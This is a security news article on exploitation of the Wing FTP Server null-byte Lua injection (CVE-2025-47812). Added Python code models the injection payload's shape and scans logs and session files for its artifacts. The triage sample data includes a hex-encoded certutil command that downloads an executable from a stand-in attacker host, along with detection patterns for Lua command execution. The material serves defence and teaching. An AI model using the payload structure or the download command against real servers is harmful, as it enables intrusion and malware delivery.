Wing FTP Server RCE Vulnerability Under Active Exploitation

Security researchers at Huntress have confirmed active exploitation of a critical remote code execution vulnerability in Wing FTP Server, designated CVE-2025-47812, with the first observed attack occurring just one day after the vulnerability’s public disclosure.

The flaw affects versions before 7.4.4 and can lead to root or SYSTEM-level remote code execution, prompting urgent calls for organizations to update their installations immediately.

Critical Vulnerability Details

CVE-2025-47812 stems from improper handling of null bytes in the username parameter submitted to loginok.html, the endpoint that processes web logins. The authentication path treats the username as a null-terminated string, while the rest of the submitted value is still carried into the session data, and that mismatch is what the attack abuses.

Attribute            Details
CVE ID               CVE-2025-47812
Vulnerability Type   Remote Code Execution (RCE)
Affected Software    Wing FTP Server
Affected Versions    All versions prior to 7.4.4
Fixed Version        7.4.4
CVSS Score           Not yet assigned
Platforms Affected   Windows, Linux, macOS

Because Wing FTP Server stores session data as Lua source and later executes it, an attacker who gets a null byte past the username check can inject Lua code that runs with the privileges of the server process, which is typically root or SYSTEM.

Figure: Process tree for the incident showing the involvement of WFTPServer.exe

The vulnerability was first publicly disclosed on June 30, 2025, by security researcher Julien Ahrens, affecting Wing FTP Server’s file transfer protocol software across Windows, Linux, and macOS platforms.

Within 24 hours of disclosure, Huntress security researchers documented the first exploitation attempt against a customer environment on July 1, 2025, with attack activity escalating around 16:15 UTC.

Attack Chain and Technical Analysis

The exploitation chain is short. Attackers send a login attempt to the loginok.html endpoint via a POST request, using either known credentials or an anonymous account where anonymous login is enabled.

The malicious payload appends a %00 null byte to the username field. The credential check stops reading at the null byte and sees only the legitimate username, while the bytes after it are written into the session object file, which is where the Lua code is injected.

Figure: View of webhook showing the victim’s machine had successfully connected

The injected code has a specific shape: two closing square brackets (]]) to terminate the Lua long-bracket string that holds the username in the session object file, a newline followed by the attacker’s Lua statements, and a comment marker (--) so that the remainder of the original line is ignored and the file still parses.

The injected Lua runs when the application loads the session object file on a subsequent page request, so the attacker only needs one more request to the server to trigger execution.
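The following Python model, added here as an illustration and not code from Wing FTP Server or from the Huntress write-up, shows why a single null byte is enough. It assumes a hypothetical session-file layout (a Lua table with the username in a [[...]] long-bracket string) and a credential check with C-string semantics; the real server internals are not reproduced. The Lua statement in the sample payload is a harmless placeholder.

```python
"""
Toy model of the null-byte inconsistency behind CVE-2025-47812.

Hypothetical, added example: the session layout, the authentication
function and the payload are stand-ins chosen to mirror the description
in the text, not Wing FTP Server's real code or file format.
"""
from typing import Optional, Set

NUL = b"\x00"


def c_string(value: bytes) -> bytes:
    """Emulate strlen()-bounded handling: everything after the first NUL is invisible."""
    idx = value.find(NUL)
    return value if idx == -1 else value[:idx]


def authenticate(username: bytes, known_users: Set[bytes]) -> bool:
    """Credential check that only ever sees the C-string prefix (hypothetical)."""
    return c_string(username) in known_users


def write_session(username: bytes) -> bytes:
    """Session writer that embeds the full, unvalidated byte string (hypothetical layout)."""
    return b"SESSION = {\n  username = [[" + username + b"]],\n}\n"


def injected_source(session: bytes) -> Optional[bytes]:
    """Return Lua text that escaped the long-bracket string, or None if the record is intact.

    In a well-formed record the first ']]' is immediately followed by ','.
    If anything else follows it, that text is live Lua source, running up to
    the '--' comment the attacker uses to swallow the original ']],'.
    """
    close = session.find(b"]]")
    if close == -1 or session[close + 2:close + 3] == b",":
        return None
    rest = session[close + 2:]
    comment = rest.find(b"\n--")
    return rest.strip() if comment == -1 else rest[:comment].strip()


def validate_username(username: bytes) -> bool:
    """The check the vulnerable path lacks: reject NUL, newlines, ']]' and non-printables."""
    if not username or NUL in username:
        return False
    if b"]]" in username or b"\n" in username or b"\r" in username:
        return False
    return all(32 <= b < 127 for b in username)


# Constructed payload in the shape the text describes: a real username, a NUL,
# ']]' to close the string, a newline, Lua, and '--' to comment out the rest.
PAYLOAD = b"anonymous" + NUL + b"]]\nio.write('injected')\n--"


if __name__ == "__main__":
    # The login check accepts the payload as the plain 'anonymous' user ...
    print("auth passes:", authenticate(PAYLOAD, {b"anonymous"}))
    # ... while the session file now contains executable Lua outside the string.
    print("escaped Lua:", injected_source(write_session(PAYLOAD)))
    print("hardened check rejects it:", not validate_username(PAYLOAD))
```

Running the module prints that authentication passes, that io.write('injected') has escaped the string, and that the hardened validator rejects the payload. The two fixes that matter are the same ones the text implies: treat the username as a length-delimited value everywhere, and never write user-controlled bytes into a file that is later executed as code.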

After gaining execution, the attackers carried out extensive reconnaissance, including system enumeration commands, created users for persistence, and attempted to deliver payloads through several methods, including the ScreenConnect remote access tool and malicious executables.

Exploitation leaves forensic artifacts in several locations within a Wing FTP Server installation.

Log files located in C:\Program Files (x86)\Wing FTP Server\Log contain truncated entries, because the logged username is cut off at the null byte, while session object files in the session directory contain the injected Lua code and are noticeably larger than a normal session file.

Analysis of session files showed attackers attempting to execute commands through hex-encoded payloads, including attempts to download and execute malicious binaries using the Windows certutil utility.

Microsoft Defender successfully intercepted several attack attempts, identifying threats as Trojan:Win32/Ceprolad.A.

Organizations running Wing FTP Server should update to version 7.4.4 immediately. Where patching must wait, disabling anonymous login removes the credential-free path described above, but it does not protect against an attacker who already holds valid credentials, so it is a stopgap rather than a fix.

Security teams should review the Log directory for truncated username entries and the session directory for files of anomalous size or containing Lua statements after the username field, and should treat any such hit as a likely compromise rather than a failed attempt, since the code runs on the next page request.
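The helpers below are an added example, not Huntress tooling or Wing FTP Server code, of how to triage the two artifact classes just described. The log line format, the session-file layout and all sample data are constructed stand-ins; the real formats differ, so the regular expressions and the size baseline are assumptions to be tuned against a known-good installation.

```python
"""
Triage helpers for CVE-2025-47812 artifacts: truncated username entries in
the log, and session object files that are oversized or carry injected Lua
(including hex-encoded command payloads).

Added example with constructed formats and samples; not Wing FTP Server's
real log or session layout.
"""
import re
from typing import Dict, List

# Hypothetical log record: [timestamp] <ip> LOGIN user="<name>" result=<status>
LOGIN_START = re.compile(rb'LOGIN user="')
LOGIN_LINE = re.compile(rb'LOGIN user="(?P<user>[^"\n]*)"')
# ']]' followed by a newline and then anything other than the ',' or '}'
# with which a well-formed Lua table record would continue.
ESCAPED_BRACKET = re.compile(rb"\]\]\s*\n(?!\s*[,}])")
LUA_EXEC = re.compile(rb"\b(?:os\.execute|io\.popen|loadstring|load)\s*\(")
HEX_RUN = re.compile(rb"(?:[0-9a-fA-F]{2}){16,}")  # at least 16 bytes of hex text


def truncated_login_lines(log: bytes) -> List[bytes]:
    """Login records that never close the username field, or carry a raw NUL.

    Both are what a %00 in the username leaves behind: a C-string logger stops
    at the NUL, a length-aware one writes the NUL into the file.
    """
    hits = []
    for line in log.splitlines():
        if b"\x00" in line:
            hits.append(line)
        elif LOGIN_START.search(line) and not LOGIN_LINE.search(line):
            hits.append(line)
    return hits


def decode_hex_runs(blob: bytes) -> List[bytes]:
    """Decode long hex strings so the analyst sees the command, not the encoding."""
    return [bytes.fromhex(m.group().decode("ascii")) for m in HEX_RUN.finditer(blob)]


def session_findings(content: bytes, size_baseline: int = 1024) -> List[str]:
    """Human-readable reasons a session object file deserves a closer look."""
    findings = []
    if len(content) > size_baseline:
        findings.append(f"size {len(content)} exceeds baseline {size_baseline}")
    if b"\x00" in content:
        findings.append("NUL byte inside session file")
    if ESCAPED_BRACKET.search(content):
        findings.append("long-bracket string closed mid-record (Lua after ]])")
    if LUA_EXEC.search(content):
        findings.append("command-execution primitive present")
    for decoded in decode_hex_runs(content):
        if b"certutil" in decoded.lower():
            findings.append("hex-encoded certutil command: " + decoded.decode(errors="replace"))
    return findings


def scan(log: bytes, sessions: Dict[str, bytes], size_baseline: int = 1024) -> Dict[str, List[str]]:
    """Combine both checks into one report keyed by artifact name."""
    report: Dict[str, List[str]] = {}
    truncated = truncated_login_lines(log)
    if truncated:
        report["log"] = [line.decode(errors="replace") for line in truncated]
    for name, content in sessions.items():
        found = session_findings(content, size_baseline)
        if found:
            report[name] = found
    return report


# --- constructed sample data, not real captures ---
SAMPLE_LOG = (
    b'[2025-07-01 16:14:50] 203.0.113.7 LOGIN user="alice" result=OK\n'
    b'[2025-07-01 16:15:02] 203.0.113.9 LOGIN user="anonymous\n'        # cut at the NUL
    b'[2025-07-01 16:15:02] 203.0.113.9 LOGIN user="anonymous\x00]]" result=OK\n'
)
CMD = b"certutil -urlcache -split -f http://attacker.invalid/update.exe C:\\Users\\Public\\update.exe"
HEX = CMD.hex().encode("ascii")
CLEAN_SESSION = b"SESSION = {\n  username = [[alice]],\n  ip = [[203.0.113.7]],\n}\n"
BAD_SESSION = (
    b"SESSION = {\n  username = [[anonymous\x00]]\n"
    b"os.execute(unhex('" + HEX + b"'))\n"   # 'unhex' is a placeholder, not a real Lua builtin
    b"--]],\n}\n"
)

if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_LOG, {"clean.lua": CLEAN_SESSION, "bad.lua": BAD_SESSION}, 128).items():
        print(name)
        for reason in reasons:
            print("  -", reason)
```

On the constructed data the clean session produces no findings, the bad one produces five (size, NUL, escaped bracket, exec primitive, decoded certutil command), and two of the three log lines are flagged. The size baseline should be set from a sample of untouched session files on the host rather than from the default used here.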

Given the rapid exploitation timeline following disclosure, this vulnerability represents a critical security risk requiring immediate attention.
